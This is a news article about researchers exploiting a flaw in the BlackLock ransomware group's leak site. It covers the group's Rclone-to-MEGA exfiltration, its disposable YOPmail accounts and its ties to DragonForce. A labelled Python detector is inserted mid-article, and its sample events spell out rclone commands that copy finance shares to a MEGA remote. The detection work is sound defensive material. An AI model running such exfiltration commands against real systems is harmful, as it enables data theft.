Researchers uncover BlackLock ransomware after exploiting vulnerability on leak site.

In a bold move that can be considered a case of hackers turning the tables on other hackers, cybersecurity experts have successfully breached the online infrastructure of a ransomware group known as BlackLock, shedding light on their tactics and operations. The cybersecurity firm Resecurity discovered a security vulnerability in the data leak site (DLS) associated with BlackLock, allowing them to extract critical information such as configuration files, credentials, and a history of commands executed on the server.

The flaw in the Data Leak Site (DLS) of BlackLock ransomware exposed clearnet IP addresses linked to their network infrastructure behind Tor hidden services, along with additional service details. According to Resecurity, the obtained history of commands represents a significant operational security failure on the part of BlackLock ransomware.

BlackLock ransomware, which is essentially a rebranded version of the Eldorado ransomware group, has emerged as one of the most active extortion syndicates in 2025. The group has been particularly targeting organizations in sectors such as technology, manufacturing, construction, finance, and retail, listing a total of 46 victims on its site last month. The victims hail from various countries including Argentina, Brazil, Canada, France, Italy, the United States, and more.

The cybersecurity experts also discovered that the hackers behind BlackLock had been using the command-line sync tool Rclone to exfiltrate data to the MEGA cloud storage service, sometimes even installing the MEGA client on victim systems. Additionally, the threat actors had created multiple accounts on MEGA, registered with disposable email addresses generated via YOPmail, to store victim data.
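As an added example (not code from the article or from Resecurity), a small Python detector that scores constructed process-creation events for the exfiltration pattern described above: Rclone executions, Rclone remotes of the `mega` type, the MEGA desktop client, and YOPmail addresses in command lines. The `host|user|image|command_line` event layout, the hostnames and the command lines are all assumptions made for the example.

```python
import re

# Constructed sample process-creation events (not from the article). The
# "host|user|image|command_line" layout is a hypothetical format for this example.
SAMPLE_EVENTS = [
    "srv-files01|svc_backup|C:\\Temp\\rclone.exe|rclone.exe config create mega-drop mega user=x7q2@yopmail.com pass=REDACTED",
    "srv-files01|svc_backup|C:\\Temp\\rclone.exe|rclone.exe copy D:\\Shares\\Finance mega-drop:finance --transfers 32",
    "wks-042|jdoe|C:\\Users\\jdoe\\Downloads\\MEGAsyncSetup64.exe|MEGAsyncSetup64.exe /S",
    "srv-db02|sqlsvc|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a backup.7z D:\\Backups",
]

RCLONE_RE = re.compile(r"rclone(\.exe)?", re.I)
# "rclone config create <name> mega ..." defines a remote backed by MEGA.
MEGA_BACKEND_RE = re.compile(r"\bconfig\s+create\s+\S+\s+mega\b", re.I)
# Rclone addresses remotes as "<name>:<path>"; the lookahead skips Windows drive letters.
RCLONE_TRANSFER_RE = re.compile(r"\b(copy|sync|move|copyto)\b.*\s(?![A-Za-z]:)[\w-]+:\S*", re.I)
MEGA_CLIENT_RE = re.compile(r"megasync", re.I)
DISPOSABLE_MAIL_RE = re.compile(r"@yopmail\.com\b", re.I)


def score_event(line):
    """Return a finding dict for one event; severity is None when nothing matched."""
    host, user, image, cmd = line.split("|", 3)
    reasons = []
    if RCLONE_RE.search(image) or RCLONE_RE.search(cmd):
        reasons.append("rclone execution")
        if MEGA_BACKEND_RE.search(cmd):
            reasons.append("rclone remote of type mega created")
        if RCLONE_TRANSFER_RE.search(cmd):
            reasons.append("rclone transfer to a named remote")
    if MEGA_CLIENT_RE.search(image) or MEGA_CLIENT_RE.search(cmd):
        reasons.append("MEGA desktop client installer/executable")
    if DISPOSABLE_MAIL_RE.search(cmd):
        reasons.append("disposable YOPmail address in command line")
    # Two or more independent indicators on one event escalate to high.
    severity = "high" if len(reasons) >= 2 else "medium" if reasons else None
    return {"host": host, "user": user, "severity": severity, "reasons": reasons}


def find_exfil_indicators(events):
    """Keep only events that produced at least one indicator."""
    return [r for r in (score_event(e) for e in events) if r["severity"]]


if __name__ == "__main__":
    for finding in find_exfil_indicators(SAMPLE_EVENTS):
        print(finding["severity"], finding["host"], finding["user"], "; ".join(finding["reasons"]))
```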

Furthermore, a closer examination of the ransomware’s source code and ransom notes revealed similarities with another ransomware strain named DragonForce, which had previously targeted organizations in Saudi Arabia. Interestingly, one of the main operators of BlackLock had launched a brief ransomware project called Mamona in March 2025.

In a surprising turn of events, the Data Leak Site of BlackLock was defaced by DragonForce, possibly through the exploitation of the same security vulnerability, leading to the exposure of configuration files and internal chats. Resecurity suggested that BlackLock might have either collaborated with DragonForce or transitioned under new ownership in response to the incidents.

Overall, the breach of BlackLock’s infrastructure sheds light on the inner workings of this ransomware group and highlights the ongoing battle between cybersecurity experts and malicious actors in the digital realm. This incident underscores the importance of proactive threat intelligence and cybersecurity measures to protect against evolving cyber threats.
